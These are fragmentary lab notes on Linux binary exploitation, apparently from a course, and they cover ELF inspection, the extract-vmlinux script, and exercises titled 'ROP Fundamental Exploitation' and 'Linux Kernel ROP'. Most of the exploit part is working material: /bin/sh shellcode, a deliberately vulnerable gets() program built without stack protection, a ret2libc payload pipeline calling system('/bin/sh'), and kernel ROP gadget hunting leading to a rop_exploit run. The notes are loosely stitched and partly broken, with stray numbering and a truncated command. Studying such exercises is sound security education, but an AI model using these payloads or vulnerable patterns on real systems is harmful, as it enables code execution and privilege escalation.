global _start

section .text

_start:   
    ; write(int fd, const void *buf, size_t count)    
    xor    eax,eax    
    xor    ebx,ebx    
    xor    ecx,ecx        
    xor    edx,edx    
    mov    al,0x4    
    inc    bl    
    push   0x000a2164    
    push   0x6c726f57    
    push   0x202c6f6c        
    push   0x6c6548    
    mov    ecx,esp    
    mov    dl,0xf    
    int    0x80
    
a. nasm -f elf32 -o code-one.o code-one.asm

b. ld -o code-one code-one.o

c. chmod +x code-one

d. ./code-one


for i in $(find / -executable -type f);do file -i $i | grep -i 'x-executable; charset=binary';done

a. readelf -S -W ~/examples/samplecode/info

b. readelf -p .text ~/examples/samplecode/info
========================================================
Exercise 9: Linux Kernel ROP and ROPgadget

!/bin/sh
# SPDX-License-Identifier: GPL-2.0-only
# ----------------------------------------------------------------------
# extract-vmlinux - Extract uncompressed vmlinux from a kernel image
#
# Inspired from extract-ikconfig
# (c) 2009,2010 Dick Streefland <dick@streefland.net>
#
# (c) 2011      Corentin Chary <corentin.chary@gmail.com>
#
# ----------------------------------------------------------------------

check_vmlinux()
{
    # Use readelf to check if it's a valid ELF
    # TODO: find a better to way to check that it's really vmlinux
    #       and not just an elf
    readelf -h $1 > /dev/null 2>&1 || return 1
    cat $1
    exit 0
}

try_decompress()
{
    # The obscure use of the "tr" filter is to work around older versions of
    # "grep" that report the byte offset of the line instead of the pattern.
    # Try to find the header ($1) and decompress from here
    for    pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
    do
        pos=${pos%%:*}
        tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
        check_vmlinux $tmp
    done
}

# Check invocation:
me=${0##*/}
img=$1
if    [ $# -ne 1 -o ! -s "$img" ]
then
    echo "Usage: $me <kernel-image>" >&2
    exit 2
fi

# Prepare temp files:
tmp=$(mktemp /tmp/vmlinux-XXX)
trap "rm -f $tmp" 0

# That didn't work, so retry after decompression.
try_decompress '\037\213\010' xy    gunzip
try_decompress '\3757zXZ\000' abcde unxz
try_decompress 'BZh'          xy    bunzip2
try_decompress '\135\0\0\0'   xxx   unlzma
try_decompress '\211\114\132' xy    'lzop -d' 
try_decompress '\002!L\030'   xxx   'lz4 -d'
try_decompress '(\265/\375'   xxx   unzstd

# Finally check for uncompressed images or objects:
check_vmlinux $img

# Bail out:
echo "$me: Cannot find vmlinux." >&2

c. readelf -x .text -W ~/examples/samplecode/info

------------


a. readelf -R .text -W ~/examples/samplecode/info

b. readelf -p .strtab -W ~/examples/samplecode/info

c. objdump -f ~/examples/samplecode/info

d. objdump -j .text -s ~/examples/samplecode/info

e. objdump -x ~/examples/samplecode/info

f. hexdump -C ~/examples/samplecode/info

---------------------   Exercise 8: ROP Fundamental Exploitation

int main() {
asm("\
needle0: jmp there\n\
here:    pop %rdi\n\
        xor %rax, %rax\n\
        movb $0x3b, %al\n\
        xor %rsi, %rsi\n\
        xor %rdx, %rdx\n\
        syscall\n\
there:   call here\n\
.string \"/bin/sh\"\n\
needle1: .octa 0xdeadbeef\n\
");
}

objdump -d ropshell | sed -n '/needle0/,/needle1/p'. 

. xxd -s0x4b8 -l40 -p ropshell shellcode



#include <stdio.h>
int main() {
char name[64];
printf("%p\n", name);  // Print address of buffer.
puts("What's your name?");
gets(name);
printf("Hello, %s!\n", name);
return 0;
}


gcc -o victim -fno-stack-protector victim.c.

 setarch `arch` -R ./victim
 
 a=\'printf %016x 0x7fffffffe1a0 | tac -rs..' 

 ((cat ropshell ; printf %080d 0 ; echo $a) | xxd -r -p ; cat ) | ./ropshell.
 
 
 objdump -d /lib/x86_64-linux-gnu/libc.so.6 | grep -B5 ret. 
 
 
 xxd -c1 -p /lib/x86_64-linux-gnu/libc.so.6 | grep -n -B1 c3 | grep 5f -m1 | awk '{printf"%x\n",$1-1}'
 
 
 a. pid=`ps -C victim -o pid --no-headers | tr -d ' '`

b. grep libc /proc/$pid/maps


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main() {
char cmd[64];
sprintf(cmd, "pmap %d", getpid());
system(cmd);
return 0;
}


40.-

a. libc=/lib/x86_64-linux-gnu/libc.so.6

b. base=0x$(setarch `arch` -R ./base | grep -m1 libc | cut -f1 -d' ')

c. echo …base at $base

d. system=0x$(nm -D $libc | grep '\<system>' | cut -f1 -d' ')

e. echo …system at $system

f. exit=0x$(nm -D $libc | grep '\<exit>' | cut -f1 -d' ')

g. echo …exit at $exit

h. gadget=0x$(xxd -c1 -p $libc | grep -n -B1 c3 | grep 5f -m1 | awk '{printf"%x\n",$1-1}')

i. echo …push-RDI gadget at $gadget


48. Enter nm -D /lib/ x86_64-linux-gnu/libc.so.6 | grep '\


addr=$(echo | setarch $(arch) -R ./victim | sed 1q)
( (
echo  -n /bin/sh | xxd -p
printf %0130d 0
printf %016x $((base+gadget)) | tac -rs..
printf %016x $((addr)) | tac -rs..
printf %016x $((base+system)) | tac -rs..
printf %016x $((base+exit)) | tac -rs..
echo
) | xxd -r -p ; cat) | setarch `arch` -R ./victim


sudo ./extract-vmlinux /boot/vmlinuz-3.13.0-32-generic > vmlinux.

a. 0f 94 c3; sete %bl

b. 94 c3; xchg eax, esp; ret

./ROPgadget.py --binary ~/Downloads/vmlinux > ~/ropgadget.

 pop %rdi; ret:
 
  grep ': pop rdi ; ret' ~/ropgadget.
  
make && sudo insmod ./drv.ko

35.-

grep ' : xchg eax, esp ; ret ' ~/ropgadget. 


37.-

 cat ~/ropgadget | grep ': xchg eax, esp ; ret' > gadgets
 
 40.- 
 
 objdump -j .text -d ~/Downloads/vmlinux | grep iretq | head -1.
 
 43.-
 
  dmesg | grep addr | grep ops.
  
  44.-
  
  ~/find_offset.py ffffffffa02e9340 ~/gadgets.
 45.-
 
  ./rop_exploit 18446744073644231139 ffffffffa02e9340. 
